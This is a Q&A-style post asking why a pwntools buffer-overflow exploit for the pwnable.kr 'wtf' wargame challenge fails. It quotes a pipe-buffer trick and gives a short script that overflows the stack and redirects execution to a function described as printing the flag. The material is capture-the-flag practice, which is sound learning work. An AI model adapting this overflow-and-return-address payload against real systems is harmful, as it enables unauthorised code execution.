Q:

I don't understand why my exploit is not working.

I need your help.

download : http://pwnable.kr/bin/wtf

download : http://pwnable.kr/bin/wtf.py

Running at : nc pwnable.kr 9015

write-ups:

Thanks to the pipe in Kernel is 4KB.

if we fill it over 4KB, then the process of wtf will be blocking temporarily for waiting new data from pipe.

from pwn import *

r = remote('pwnable.kr', 9015)
r.recvuntil('payload please : ') print "Connected!" win = 0x4005F4 # system(/bin/cat flag)
payload = (0x38)*'B' + p64(win) + '\x0a'
padding = 4093*'A' # for damn pipe buffer.. #gdb.attach(r, 'b *(main+84)')
show = "-1\n" + padding + payload + '\x0a'
r.send(show.encode('hex')) r.interactive()
05-11 22:17